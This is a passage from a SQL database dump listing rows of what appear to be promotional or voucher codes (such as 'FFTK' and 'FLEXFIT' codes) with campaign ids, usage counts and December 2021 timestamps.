10:01:03',1,NULL),(367,3,'FFTKG5X',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(368,3,'FFTKBT3',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(369,3,'FFTKH2N',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(370,3,'FFTKYZ0',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(371,3,'FFTKTPY',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(372,3,'FFTKN42',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(373,3,'FFTK1UF',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(374,3,'FFTKACI',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(375,3,'FFTK2CP',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(376,3,'FFTKIX5',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(377,3,'FFTKX8X',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(378,3,'FFTKY6L',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(379,3,'FFTKN5U',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(380,3,'FFTKICD',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(381,3,'FFTK8TM',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(382,3,'FFTKUDT',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(383,3,'FFTKWQE',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(384,3,'FFTKZ2J',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(385,3,'FFTKI7E',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(386,3,'FFTKZYZ',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(387,3,'FFTKB7O',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(388,3,'FFTK1B6',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(389,3,'FFTKHD8',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(390,3,'FFTKHVL',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(391,3,'FFTKTSA',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(392,3,'FFTK6WM',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(393,3,'FFTK5G1',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(394,3,'FFTKZT0',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(395,3,'FFTK8CG',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(396,3,'FFTKPHH',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(397,3,'FFTKRH2',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(398,3,'FFTK421',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(399,3,'FFTKK6G',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(400,3,'FFTK2HN',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(401,3,'FFTKDM3',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(402,3,'FFTKI7O',1,1,0,NULL,NULL,'2021-12-17 10:01:03',1,NULL),(403,3,'FFTKS20',1,1,0,NULL,NULL,'2021-12-21 03:35:04',1,NULL),(404,3,'FFTKL7L',1,1,0,NULL,NULL,'2021-12-21 03:35:04',1,NULL),(405,3,'FFTKC0O',1,1,0,NULL,NULL,'2021-12-21 03:35:04',1,NULL),(406,3,'FFTKUXV',1,1,0,NULL,NULL,'2021-12-21 03:35:04',1,NULL),(407,3,'FFTK6ZD',1,1,0,NULL,NULL,'2021-12-21 03:35:04',1,NULL),(408,3,'FFTKLD5',1,1,0,NULL,NULL,'2021-12-21 03:35:04',1,NULL),(409,3,'FFTK72R',1,1,0,NULL,NULL,'2021-12-21 03:35:04',1,NULL),(410,3,'FFTKHHY',1,1,0,NULL,NULL,'2021-12-21 03:35:04',1,NULL),(411,3,'FFTKGQ7',1,1,0,NULL,NULL,'2021-12-21 03:35:04',1,NULL),(412,3,'FFTK9U6',1,1,0,NULL,NULL,'2021-12-21 03:35:04',1,NULL),(413,3,'FFTK076',1,1,0,NULL,NULL,'2021-12-21 03:35:04',1,NULL),(414,3,'FFTK34I',1,1,0,NULL,NULL,'2021-12-21 03:35:04',1,NULL),(415,3,'FFTKTIM',1,1,0,NULL,NULL,'2021-12-21 03:35:04',1,NULL),(416,3,'FFTKVVB',1,1,0,NULL,NULL,'2021-12-21 03:35:04',1,NULL),(417,3,'FFTKEAG',1,1,0,NULL,NULL,'2021-12-21 03:35:04',1,NULL),(418,3,'FFTKZGZ',1,1,0,NULL,NULL,'2021-12-21 03:35:04',1,NULL),(419,3,'FFTK2J5',1,1,0,NULL,NULL,'2021-12-21 03:35:04',1,NULL),(420,3,'FFTKJFT',1,1,0,NULL,NULL,'2021-12-21 03:35:04',1,NULL),(421,3,'FFTKMAV',1,1,0,NULL,NULL,'2021-12-21 03:35:04',1,NULL),(422,3,'FFTKH39',1,1,0,NULL,NULL,'2021-12-21 03:35:04',1,NULL),(423,3,'FFTKZVM',1,1,0,NULL,NULL,'2021-12-21 03:35:04',1,NULL),(424,3,'FFTKGVZ',1,1,0,NULL,NULL,'2021-12-21 03:35:04',1,NULL),(425,3,'FFTK9ET',1,1,0,NULL,NULL,'2021-12-21 03:35:04',1,NULL),(426,3,'FFTKY5W',1,1,0,NULL,NULL,'2021-12-21 03:35:04',1,NULL),(427,3,'FFTKFSK',1,1,0,NULL,NULL,'2021-12-21 03:35:04',1,NULL),(428,3,'FFTKLOX',1,1,0,NULL,NULL,'2021-12-21 03:35:04',1,NULL),(429,3,'FFTKFAZ',1,1,0,NULL,NULL,'2021-12-21 03:35:04',1,NULL),(430,3,'FFTKT3I',1,1,0,NULL,NULL,'2021-12-21 03:35:04',1,NULL),(431,3,'FFTK5RD',1,1,0,NULL,NULL,'2021-12-21 03:35:04',1,NULL),(432,3,'FFTKDRS',1,1,0,NULL,NULL,'2021-12-21 03:35:04',1,NULL),(433,3,'FFTKVAH',1,1,0,NULL,NULL,'2021-12-21 03:35:04',1,NULL),(434,3,'FFTKTRG',1,1,0,NULL,NULL,'2021-12-21 03:35:04',1,NULL),(435,3,'FFTKWR8',1,1,0,NULL,NULL,'2021-12-21 03:35:04',1,NULL),(436,3,'FFTKYR5',1,1,0,NULL,NULL,'2021-12-21 03:35:04',1,NULL),(437,3,'FFTK0ME',1,1,0,NULL,NULL,'2021-12-21 03:35:04',1,NULL),(438,3,'FFTKC27',1,1,0,NULL,NULL,'2021-12-21 03:35:04',1,NULL),(439,3,'FFTKOYM',1,1,0,NULL,NULL,'2021-12-21 03:35:04',1,NULL),(440,3,'FFTKOWE',1,1,0,NULL,NULL,'2021-12-21 03:35:04',1,NULL),(441,3,'FFTKMY1',1,1,0,NULL,NULL,'2021-12-21 03:35:04',1,NULL),(442,3,'FFTKCIF',1,1,0,NULL,NULL,'2021-12-21 03:35:04',1,NULL),(443,3,'FFTKN77',1,1,0,NULL,NULL,'2021-12-21 03:35:04',1,NULL),(444,3,'FFTKUHV',1,1,0,NULL,NULL,'2021-12-21 03:35:04',1,NULL),(445,3,'FFTKLVM',1,1,0,NULL,NULL,'2021-12-21 03:35:04',1,NULL),(446,3,'FFTKJDE',1,1,0,NULL,NULL,'2021-12-21 03:35:04',1,NULL),(447,3,'FFTKE1B',1,1,0,NULL,NULL,'2021-12-21 03:35:04',1,NULL),(448,3,'FFTK556',1,1,0,NULL,NULL,'2021-12-21 03:35:04',1,NULL),(449,3,'FFTKT3O',1,1,0,NULL,NULL,'2021-12-21 03:35:04',1,NULL),(450,3,'FFTK7GT',1,1,0,NULL,NULL,'2021-12-21 03:35:04',1,NULL),(451,3,'FFTKOEO',1,1,0,NULL,NULL,'2021-12-21 03:35:04',1,NULL),(452,3,'FFTKZB1',1,1,0,NULL,NULL,'2021-12-21 03:35:04',1,NULL),(453,3,'FFTKNK5',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(454,3,'FFTK4KU',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(455,3,'FFTK6O9',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(456,3,'FFTKA68',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(457,3,'FFTKGBP',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(458,3,'FFTKA65',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(459,3,'FFTKQ6M',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(460,3,'FFTKJRF',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(461,3,'FFTKKOD',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(462,3,'FFTK84V',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(463,3,'FFTK3KC',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(464,3,'FFTKXML',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(465,3,'FFTKTFX',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(466,3,'FFTKS5R',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(467,3,'FFTKGTY',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(468,3,'FFTKR8R',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(469,3,'FFTK4WZ',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(470,3,'FFTKIQW',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(471,3,'FFTKK96',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(472,3,'FFTK222',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(473,3,'FFTKJGK',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(474,3,'FFTK1MQ',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(475,3,'FFTKKBU',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(476,3,'FFTK98P',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(477,3,'FFTK9HA',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(478,3,'FFTK450',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(479,3,'FFTKNO7',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(480,3,'FFTKVEV',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(481,3,'FFTKX0X',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(482,3,'FFTKVKO',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(483,3,'FFTKQH1',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(484,3,'FFTKMRQ',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(485,3,'FFTKJA5',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(486,3,'FFTK2VF',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(487,3,'FFTKVKR',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(488,3,'FFTKWEG',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(489,3,'FFTKK7P',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(490,3,'FFTKPTA',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(491,3,'FFTKEGE',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(492,3,'FFTKJ8I',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(493,3,'FFTK73I',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(494,3,'FFTK8LJ',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(495,3,'FFTK5IB',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(496,3,'FFTKCDA',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(497,3,'FFTKG58',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(498,3,'FFTK05C',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(499,3,'FFTKRMS',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(500,3,'FFTKLI5',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(501,3,'FFTK8KU',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(502,3,'FFTKMYR',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(503,3,'FFTKNOI',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(504,3,'FFTKZS4',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(505,3,'FFTK45S',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(506,3,'FFTKGU6',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(507,3,'FFTKZ4R',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(508,3,'FFTK6W8',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(509,3,'FFTKEPL',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(510,3,'FFTKX31',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(511,3,'FFTKMQM',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(512,3,'FFTKDH9',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(513,3,'FFTKBWJ',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(514,3,'FFTKKHP',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(515,3,'FFTK0A4',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(516,3,'FFTK851',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(517,3,'FFTKMWU',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(518,3,'FFTK995',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(519,3,'FFTKAS6',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(520,3,'FFTK2MQ',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(521,3,'FFTK6A3',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(522,3,'FFTKQHC',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(523,3,'FFTKE5O',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(524,3,'FFTKR7K',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(525,3,'FFTKK6K',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(526,3,'FFTKJTB',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(527,3,'FFTKSUI',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(528,3,'FFTKYC7',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(529,3,'FFTKH6U',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(530,3,'FFTKXTC',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(531,3,'FFTKFEE',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(532,3,'FFTKN8N',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(533,3,'FFTKJY2',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(534,3,'FFTK8EK',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(535,3,'FFTKHFJ',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(536,3,'FFTKJDO',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(537,3,'FFTK8E1',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(538,3,'FFTKQ3S',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(539,3,'FFTKUFS',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(540,3,'FFTK62H',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(541,3,'FFTKBAU',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(542,3,'FFTK1D3',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(543,3,'FFTKAW6',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(544,3,'FFTKH4C',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(545,3,'FFTKN57',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(546,3,'FFTKRDC',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(547,3,'FFTKLXX',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(548,3,'FFTK5V4',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(549,3,'FFTKUOH',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(550,3,'FFTKDLP',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(551,3,'FFTK1GG',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(552,3,'FFTKVTE',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(553,3,'FFTKMRK',1,1,0,NULL,NULL,'2021-12-22 11:06:04',1,NULL),(604,3,'FFTKBR9',1,1,0,NULL,NULL,'2021-12-23 04:59:54',1,NULL),(605,3,'FFTKH6P',1,1,0,NULL,NULL,'2021-12-23 04:59:54',1,NULL),(606,3,'FFTKCU3',1,1,0,NULL,NULL,'2021-12-23 04:59:54',1,NULL),(607,3,'FFTK4DJ',1,1,0,NULL,NULL,'2021-12-23 04:59:54',1,NULL),(608,3,'FFTK8AM',1,1,0,NULL,NULL,'2021-12-23 04:59:54',1,NULL),(609,3,'FFTKCN1',1,1,0,NULL,NULL,'2021-12-23 04:59:54',1,NULL),(610,3,'FFTKK0Z',1,1,0,NULL,NULL,'2021-12-23 04:59:54',1,NULL),(611,3,'FFTKED6',1,1,0,NULL,NULL,'2021-12-23 04:59:54',1,NULL),(612,3,'FFTKT2K',1,1,0,NULL,NULL,'2021-12-23 04:59:54',1,NULL),(613,3,'FFTKTI8',1,1,0,NULL,NULL,'2021-12-23 04:59:54',1,NULL),(614,3,'FFTKI1B',1,1,0,NULL,NULL,'2021-12-23 04:59:54',1,NULL),(615,3,'FFTKGD6',1,1,0,NULL,NULL,'2021-12-23 04:59:54',1,NULL),(616,3,'FFTK9KX',1,1,0,NULL,NULL,'2021-12-23 04:59:54',1,NULL),(617,3,'FFTKNCZ',1,1,0,NULL,NULL,'2021-12-23 04:59:54',1,NULL),(618,3,'FFTKBXT',1,1,0,NULL,NULL,'2021-12-23 04:59:54',1,NULL),(619,3,'FFTKHN5',1,1,0,NULL,NULL,'2021-12-23 04:59:54',1,NULL),(620,3,'FFTKKT5',1,1,0,NULL,NULL,'2021-12-23 04:59:54',1,NULL),(621,3,'FFTKNC4',1,1,0,NULL,NULL,'2021-12-23 04:59:54',1,NULL),(622,3,'FFTKQYC',1,1,0,NULL,NULL,'2021-12-23 04:59:54',1,NULL),(623,3,'FFTKNI5',1,1,0,NULL,NULL,'2021-12-23 04:59:54',1,NULL),(624,3,'FFTKX07',1,1,0,NULL,NULL,'2021-12-23 04:59:54',1,NULL),(625,3,'FFTK2IP',1,1,0,NULL,NULL,'2021-12-23 04:59:54',1,NULL),(626,3,'FFTKJD7',1,1,0,NULL,NULL,'2021-12-23 04:59:54',1,NULL),(627,3,'FFTKDUM',1,1,0,NULL,NULL,'2021-12-23 04:59:54',1,NULL),(628,3,'FFTKDXS',1,1,0,NULL,NULL,'2021-12-23 04:59:54',1,NULL),(629,3,'FFTKKDO',1,1,0,NULL,NULL,'2021-12-23 04:59:54',1,NULL),(630,3,'FFTKXQC',1,1,0,NULL,NULL,'2021-12-23 04:59:54',1,NULL),(631,3,'FFTKF5N',1,1,0,NULL,NULL,'2021-12-23 04:59:54',1,NULL),(632,3,'FFTKAQ1',1,1,0,NULL,NULL,'2021-12-23 04:59:54',1,NULL),(633,3,'FFTKTG0',1,1,0,NULL,NULL,'2021-12-23 04:59:54',1,NULL),(634,3,'FFTK3AW',1,1,0,NULL,NULL,'2021-12-23 04:59:54',1,NULL),(635,3,'FFTK0H4',1,1,0,NULL,NULL,'2021-12-23 04:59:54',1,NULL),(636,3,'FFTK2SR',1,1,0,NULL,NULL,'2021-12-23 04:59:54',1,NULL),(637,3,'FFTKHTE',1,1,0,NULL,NULL,'2021-12-23 04:59:54',1,NULL),(638,3,'FFTK498',1,1,0,NULL,NULL,'2021-12-23 04:59:54',1,NULL),(639,3,'FFTKY0Y',1,1,0,NULL,NULL,'2021-12-23 04:59:54',1,NULL),(640,3,'FFTKMKP',1,1,0,NULL,NULL,'2021-12-23 04:59:54',1,NULL),(641,3,'FFTKQAW',1,1,0,NULL,NULL,'2021-12-23 04:59:54',1,NULL),(642,3,'FFTKYU8',1,1,0,NULL,NULL,'2021-12-23 04:59:54',1,NULL),(643,3,'FFTKVWX',1,1,0,NULL,NULL,'2021-12-23 04:59:54',1,NULL),(644,3,'FFTK8L5',1,1,0,NULL,NULL,'2021-12-23 04:59:54',1,NULL),(645,3,'FFTKUMV',1,1,0,NULL,NULL,'2021-12-23 04:59:54',1,NULL),(646,3,'FFTKVW6',1,1,0,NULL,NULL,'2021-12-23 04:59:54',1,NULL),(647,3,'FFTK3VC',1,1,0,NULL,NULL,'2021-12-23 04:59:54',1,NULL),(648,3,'FFTKUMR',1,1,0,NULL,NULL,'2021-12-23 04:59:54',1,NULL),(649,3,'FFTKA9Z',1,1,0,NULL,NULL,'2021-12-23 04:59:54',1,NULL),(650,3,'FFTKWFP',1,1,0,NULL,NULL,'2021-12-23 04:59:54',1,NULL),(651,3,'FFTKP8X',1,1,0,NULL,NULL,'2021-12-23 04:59:54',1,NULL),(652,3,'FFTKQ5X',1,1,0,NULL,NULL,'2021-12-23 04:59:54',1,NULL),(653,3,'FFTKHWH',1,1,0,NULL,NULL,'2021-12-23 04:59:54',1,NULL),(654,2,'FLEXFIT86G',1,1,0,NULL,NULL,'2021-12-23 08:29:43',1,NULL),(655,2,'FLEXFITOIE',1,1,0,NULL,NULL,'2021-12-23 08:29:43',1,NULL),(656,2,'FLEXFITE8X',1,1,0,NULL,NULL,'2021-12-23 08:29:43',1,NULL),(657,2,'FLEXFITZUM',1,1,0,NULL,NULL,'2021-12-23 08:29:43',1,NULL),(658,2,'FLEXFITBBW',1,1,0,NULL,NULL,'2021-12-23 08:29:43',1,NULL),(659,2,'FLEXFITDI2',1,1,0,NULL,NULL,'2021-12-23 08:29:43',1,NULL),(660,2,'FLEXFIT0G0',1,1,0,NULL,NULL,'2021-12-23 08:29:43',1,NULL),(661,2,'FLEXFITNJH',1,1,0,NULL,NULL,'2021-12-23 08:29:43',1,NULL),(662,2,'FLEXFIT4FC',1,1,0,NULL,NULL,'2021-12-23 08:29:43',1,NULL),(663,2,'FLEXFITMI0',1,1,0,NULL,NULL,'2021-12-23 08:29:43',1,NULL),(664,2,'FLEXFITAUY',1,1,0,NULL,NULL,'2021-12-23 08:29:43',1,NULL),(665,2,'FLEXFIT9I0',1,1,0,NULL,NULL,'2021-12-23 08:29:43',1,NULL),(666,2,'FLEXFITMUP',1,1,0,NULL,NULL,'2021-12-23 08:29:43',1,NULL),(667,2,'FLEXFITGXE',1,1,0,NULL,NULL,'2021-12-23 08:29:43',1,NULL),(668,2,'FLEXFIT788',1,1,0,NULL,NULL,'2021-12-23 08:29:43',1,NULL),(669,2,'FLEXFITOFN',1,1,0,NULL,NULL,'2021-12-23 08:29:43',1,NULL),(670,2,'FLEXFITPUE',1,1,0,NULL,NULL,'2021-12-23 08:29:43',1,NULL),(671,2,'FLEXFITBGR',1,1,0,NULL,NULL,'2021-12-23 08:29:43',1,NULL),(672,2,'FLEXFITG7D',1,1,0,NULL,NULL,'2021-12-23 08:29:43',1,NULL),(673,2,'FLEXFITSI8',1,1,0,NULL,NULL,'2021-12-23 08:29:43',1,NULL),(674,2,'FLEXFIT8F7',1,1,0,NULL,NULL,'2021-12-23 08:29:43',1,NULL),(675,2,'FLEXFIT3ZL',1,1,0,NULL,NULL,'2021-12-23 08:29:43',1,NULL),(676,2,'FLEXFITSLN',1,1,0,NULL,NULL,'2021-12-23 08:29:43',1,NULL),(677,2,'FLEXFITI7P',1,1,0,NULL,NULL,'2021-12-23 08:29:43',1,NULL),(678,2,'FLEXFIT9MZ',1,1,0,NULL,NULL,'2021-12-23 08:29:43',1,NULL),(679,2,'FLEXFITAEP',1,1,0,NULL,NULL,'2021-12-23 08:29:43',1,NULL),(680,2,'FLEXFITN79',1,1,0,NULL,NULL,'2021-12-23 08:29:43',1,NULL),(681,2,'FLEXFITJ9E',1,1,0,NULL,NULL,'2021-12-23 08:29:43',1,NULL),(682,2,'FLEXFITUYS',1,1,0,NULL,NULL,'2021-12-23 08:29:43',1,NULL),(683,2,'FLEXFITNX3',1,1,0,NULL,NULL,'2021-12-23 08:29:43',1,NULL),(684,2,'FLEXFITHQ2',1,1,0,NULL,NULL,'2021-12-23 08:29:43',1,NULL),(685,2,'FLEXFIT23X',1,1,0,NULL,NULL,'2021-12-23 08:29:43',1,NULL),(686,2,'FLEXFIT6KC',1,1,0,NULL,NULL,'2021-12-23 08:29:43',1,NULL),(687,2,'FLEXFITJHL',1,1,0,NULL,NULL,'2021-12-23 08:29:43',1,NULL),(688,2,'FLEXFITRI8',1,1,0,NULL,NULL,'2021-12-23 08:29:43',1,NULL),(689,2,'FLEXFITTUU',1,1,0,NULL,NULL,'2021-12-23 08:29:43',1,NULL),(690,2,'FLEXFITYI6',1,1,0,NULL,NULL,'2021-12-23 08:29:43',1,NULL),(691,2,'FLEXFITP20',1,1,0,NULL,NULL,'2021-12-23 08:29:43',1,NULL),(692,2,'FLEXFITNXO',1,1,0,NULL,NULL,'2021-12-23 08:29:43',1,NULL),(693,2,'FLEXFITDIG',1,1,0,NULL,NULL,'2021-12-23 08:29:43',1,NULL),(694,2,'FLEXFITTIV',1,1,0,NULL,NULL,'2021-12-23 08:29:43',1,NULL),(695,2,'FLEXFITCMN',1,1,0,NULL,NULL,'2021-12-23 08:29:43',1,NULL),(696,2,'FLEXFIT12R',1,1,0,NULL,NULL,'2021-12-23 08:29:43',1,NULL),(697,2,'FLEXFIT3O5',1,1,0,NULL,NULL,'2021-12-23 08:29:43',1,NULL),(698,2,'FLEXFITJWO',1,1,0,NULL,NULL,'2021-12-23 08:29:43',1,NULL),(699,2,'FLEXFITLCM',1,1,0,NULL,NULL,'2021-12-23 08:29:43',1,NULL),(700,2,'FLEXFIT3XR',1,1,0,NULL,NULL,'2021-12-23 08:29:43',1,NULL),(701,2,'FLEXFITUUW',1,1,0,NULL,NULL,'2021-12-23 08:29:43',1,NULL),(702,2,'FLEXFITVV9',1,1,0,NULL,NULL,'2021-12-23 08:29:43',1,NULL),(703,2,'FLEXFITB2W',1,1,0,NULL,NULL,'2021-12-23 08:29:43',1,NULL),(704,4,'FFLIVES1',100,1,0,NULL,NULL,'2021-12-23 08:46:26',1,NULL),(705,2,'FLEXFIT81D',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(706,2,'FLEXFITPF4',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(707,2,'FLEXFITN68',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(708,2,'FLEXFITSKO',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(709,2,'FLEXFITITS',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(710,2,'FLEXFITC9R',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(711,2,'FLEXFIT2GH',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(712,2,'FLEXFIT209',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(713,2,'FLEXFIT70J',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(714,2,'FLEXFITV8X',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(715,2,'FLEXFIT10M',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(716,2,'FLEXFITKGY',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(717,2,'FLEXFITYWS',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(718,2,'FLEXFITCEB',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(719,2,'FLEXFITQ4W',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(720,2,'FLEXFITIW1',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(721,2,'FLEXFITNQ0',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(722,2,'FLEXFIT55R',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(723,2,'FLEXFIT5OB',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(724,2,'FLEXFIT7EC',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(725,2,'FLEXFITDAD',1,1,0,NULL,NULL,'2021-12-30 